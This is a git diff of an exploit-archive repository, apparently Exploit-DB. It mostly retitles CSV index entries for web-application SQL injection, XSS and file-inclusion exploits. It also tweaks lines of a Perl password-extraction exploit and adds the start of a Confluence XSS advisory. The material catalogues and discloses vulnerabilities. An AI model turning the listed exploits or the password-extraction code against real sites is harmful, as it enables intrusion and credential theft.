Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -22674,7 +22675,7 @@ id,file,description,date,author,platform,type,port 11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0 -11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection",2010-03-22,cr4wl3r,php,webapps,0 +11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 @@ -23352,7 +23353,7 @@ id,file,description,date,author,platform,type,port 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0 13751,platforms/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps,0 -13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0 +13752,platforms/php/webapps/13752.txt,"ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -24596,7 +24597,7 @@ id,file,description,date,author,platform,type,port 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 -17061,platforms/php/webapps/17061.txt,"Andy's PHP KnowledgeBase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 +17061,platforms/php/webapps/17061.txt,"Andy's PHP KnowledgeBase 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 - Persistent Cross-Site Scripting",2011-03-29,"AutoSec Tools",php,webapps,0 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 @@ -24604,7 +24605,7 @@ id,file,description,date,author,platform,type,port 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0 17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 -17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 +17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 17092,platforms/php/webapps/17092.html,"Allomani News 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -25207,7 +25208,7 @@ id,file,description,date,author,platform,type,port 18417,platforms/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - Cross-Site Request Forgery",2012-01-26,Cyber-Crystal,php,webapps,0 18419,platforms/php/webapps/18419.html,"phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,php,webapps,0 -18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 +18422,platforms/php/webapps/18422.txt,"Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 18424,platforms/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)",2012-01-27,EgiX,php,webapps,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - Cross-Site Request Forgery / Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",multiple,webapps,0 @@ -27960,7 +27961,7 @@ id,file,description,date,author,platform,type,port 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php' 'Username' Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 -26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 +26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0 26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0 26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - view.php id Parameter Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 @@ -30236,8 +30237,8 @@ id,file,description,date,author,platform,type,port 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 -29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 +29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 +29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 @@ -30269,11 +30270,11 @@ id,file,description,date,author,platform,type,port 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",asp,webapps,0 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 -29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 - viewad.asp id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 - view_print.asp id Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 - reply.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp Denial of Serviceearch Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 - 'viewad.asp' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Parameter Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 @@ -30609,7 +30610,7 @@ id,file,description,date,author,platform,type,port 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 -29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - directions.php typeID Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 +29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ - Arcade.php SQL Injection",2007-02-15,sp00k,php,webapps,0 29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 - faq.php Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps,0 29606,platforms/php/webapps/29606.txt,"Calendar Express - search.php Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0 @@ -30932,7 +30933,7 @@ id,file,description,date,author,platform,type,port 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps,0 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0 30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0 -30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0 +30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0 30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - rating.php Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0 @@ -31307,7 +31308,7 @@ id,file,description,date,author,platform,type,port 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - igallery.asp Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0 -30747,platforms/asp/webapps/30747.txt,"Rapid Classified - AgencyCatResult.asp SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0 +30747,platforms/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0 30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 @@ -31335,15 +31336,15 @@ id,file,description,date,author,platform,type,port 30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - incPHP/globals.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - plugins/export/mc_table.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 -30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - /myalbum/ratephoto.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0 -30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - modules/mylinks/ratelink.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0 +30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 +30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - adresses/ratefile.php SQL Injection",2007-11-30,Lostmon,php,webapps,0 +30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0 30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx Multiple Parameter SQL Injection",2007-12-04,"Adrian Pastor",asp,webapps,0 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx rmore Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 @@ -32411,10 +32412,10 @@ id,file,description,date,author,platform,type,port 32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 - 'html-tidy-logic.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 -32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 +32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injection",2008-10-27,G4N0K,php,webapps,0 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps,0 -32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 +32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0 @@ -32486,8 +32487,8 @@ id,file,description,date,author,platform,type,port 32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps,0 32632,platforms/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps,0 -32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 - showads.php id Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0 -32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 - showads.php id Parameter Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 +32633,platforms/php/webapps/32633.txt,"Z1Exchange 1.0 - 'id' Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0 +32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 - 'id' Parameter Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 32635,platforms/asp/webapps/32635.txt,"Jbook - SQL Injection",2008-12-02,Pouya_Server,asp,webapps,0 32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0 32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0 @@ -32505,7 +32506,7 @@ id,file,description,date,author,platform,type,port 32650,platforms/php/webapps/32650.txt,"PHPepperShop 1.4 - shop/kontakt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32651,platforms/php/webapps/32651.txt,"PHPepperShop 1.4 - shop/Admin/shop_kunden_mgmt.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32652,platforms/php/webapps/32652.txt,"PHPepperShop 1.4 - shop/Admin/SHOP_KONFIGURATION.php URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 -32653,platforms/asp/webapps/32653.txt,"dotnetindex Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 +32653,platforms/asp/webapps/32653.txt,"Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products - 'logon_processing.jsp' SQL Injection",2008-12-11,"3d D3v!L",jsp,webapps,0 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",php,webapps,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' Parameter SQL Injection",2008-12-13,Pouya_Server,asp,webapps,0 @@ -32545,8 +32546,8 @@ id,file,description,date,author,platform,type,port 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 -32730,platforms/asp/webapps/32730.txt,"Active Bids - search.asp search Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 -32731,platforms/asp/webapps/32731.txt,"Active Bids - search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 +32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 +32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' Parameter SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 @@ -35105,7 +35106,7 @@ id,file,description,date,author,platform,type,port 37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps,0 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 - code_editor.php Multiple Parameter Cross-Site Scripting",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 -37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 +37024,platforms/php/webapps/37024.txt,"EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection",2012-03-30,MR.XpR,php,webapps,0 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0 @@ -36934,3 +36935,4 @@ id,file,description,date,author,platform,type,port 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0 40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0 +40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0 diff --git a/platforms/asp/webapps/1597.pl b/platforms/asp/webapps/1597.pl index 8b3167d7a..381e91869 100755 --- a/platforms/asp/webapps/1597.pl +++ b/platforms/asp/webapps/1597.pl @@ -62,14 +62,14 @@ sub exploit () print $ap "Connection: close\n\n"; print "- Connected...\r\n"; while ($answer = <$ap>) { - if ($answer =~ /string: "(.*?)"]'/) { + if ($answer =~ /string: "(.*?)"]'/) { print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; print "- Username: $ARGV[2]\r\n"; print "- Decrypting password....\r\n"; $appass = $1; - $appass =~ s/(")/chr(34)/eg; - $appass =~ s/(<)/chr(60)/eg; - $appass =~ s/(>)/chr(62)/eg; + $appass =~ s/(")/chr(34)/eg; + $appass =~ s/(<)/chr(60)/eg; + $appass =~ s/(>)/chr(62)/eg; $appass =~ s/( )/chr(32)/eg; decrypt(); } diff --git a/platforms/asp/webapps/2762.asp b/platforms/asp/webapps/2762.asp index 2b2692b6d..526a9886e 100755 --- a/platforms/asp/webapps/2762.asp +++ b/platforms/asp/webapps/2762.asp @@ -57,7 +57,7 @@ document.getElementById('htmlAlani').innerHTML='
-ASPPortal <=v4.0.0(default1.asp) +ASPPortal <=v4.0.0(default1.asp) Remote SQL Injection Exploit

diff --git a/platforms/jsp/webapps/40989.txt b/platforms/jsp/webapps/40989.txt new file mode 100755 index 000000000..df2a1f685 --- /dev/null +++ b/platforms/jsp/webapps/40989.txt @@ -0,0 +1,90 @@ +=====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]============== + + Persisted Cross-Site Scripting (XSS) in Confluence Jira Software + ---------------------------------------------------------------- + + Author(s): + - Jodson Santos + - jodson.santos@tempest.com.br + + Tempest Security Intelligence - Recife, Pernambuco - Brazil + +=====[Table of Contents]===================================================== + +1. Overview +2. Detailed description +3. Affected versions & Solutions +4. Timeline of disclosure +5. Thanks & Acknowledgements +6. References + +=====[1. Overview]============================================================ + + * System affected : Atlassian Confluence + * Software Version : 5.9.12 + Other versions or models may also be affected. + * Impact : This vulnerability allows an attacker to use +Confluence's + platform to deliver 